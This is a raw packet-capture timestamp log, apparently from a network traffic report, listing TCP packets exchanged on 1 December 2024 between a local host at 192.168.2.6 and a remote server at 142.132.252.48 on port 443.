                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.133954048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.133968115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.134037018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.135519028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.139653921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.139760017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.139817953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.139817953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.139827013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.139904022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.171329021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.299628973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.299674988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.299736023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.299742937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.299797058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.305361032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.305382967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.305458069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.305471897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.305541039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.310388088 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.310460091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.310473919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.310534000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.316068888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.316087961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.316133976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.316139936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.316179991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.316179991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.322024107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.322043896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.322148085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.322155952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.322206020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.330044031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.330060005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.330219030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.330229998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.330272913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.334954977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.334971905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.335035086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.335041046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.335117102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.340715885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.340797901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.340799093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.340809107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.340859890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.500901937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.500926971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.501147032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.501159906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.501214027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.506367922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.506386042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.506477118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.506484985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.506531954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.511778116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.511795998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.511858940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.511877060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.511920929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.517335892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.517352104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.517452955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.517460108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.517507076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.523076057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.523092985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.523181915 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.523189068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.523262978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.531039953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.531069040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.531161070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.531161070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.531168938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.531223059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.536714077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.536734104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.536823988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.536830902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.536906004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.542417049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.542437077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.542519093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.542526007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.542577982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.555217028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.702451944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.702471972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.702538967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.702548981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.702584028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.707849979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.707865953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.707935095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.707942009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.707983017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.707983017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.713552952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.713571072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.713634968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.713650942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.713709116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.718470097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.718487024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.718568087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.718568087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.718580008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.718628883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.724222898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.724241972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.724308968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.724314928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.724358082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.732616901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.732635975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.732723951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.732731104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.732783079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.738245964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.738264084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.738364935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.738373041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.738434076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.743268967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.743295908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.743371010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.743379116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.743417025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.904237986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.904258966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.904360056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.904366970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.904409885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.909924030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.909940958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.910054922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.910064936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.910140991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.914839983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.914855003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.914937973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.914947033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.914985895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.914985895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.920286894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.920316935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.920412064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.920425892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.920488119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.925880909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.925896883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.925976038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.925982952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.925997019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.926016092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.934096098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.934113979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.934159994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.934175968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.934253931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.934253931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.939790010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.939810038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.939881086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.939889908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.939917088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.940543890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.944869995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.944892883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.944943905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.945050001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.981041908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.981055021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:05.981148958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.105104923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.105127096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.105326891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.105345011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.105412006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.110749960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.110780001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.110853910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.110853910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.110871077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.110943079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.115844011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.115859985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.115933895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.115947008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.115981102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.115981102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.121558905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.121576071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.121645927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.121654034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.121673107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.121700048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.127547026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.127568007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.127718925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.127728939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.127780914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.135689974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.135713100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.135878086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.135896921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.135946035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.140712976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.140729904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.140819073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.140826941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.140876055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.146275043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.146291018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.146356106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.146362066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.146409035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.262511015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.269954920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.306476116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.306499958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.306556940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.306566954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.306601048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.306610107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.311997890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.312015057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.312068939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.312074900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.312087059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.312135935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.317426920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.317442894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.317502975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.317509890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.317558050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.323226929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.323251963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.323292017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.323306084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.323328972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.323348045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.328739882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.328773022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.328807116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.328818083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.328871012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.328871965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.336754084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.336780071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.336857080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.336858034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.336867094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.336913109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.342441082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.342458963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.342515945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.342516899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.342529058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.342570066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.347434998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.347455025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.347505093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.347522020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:06.347532034 CET49721443192.168.2.6142.132.252.48
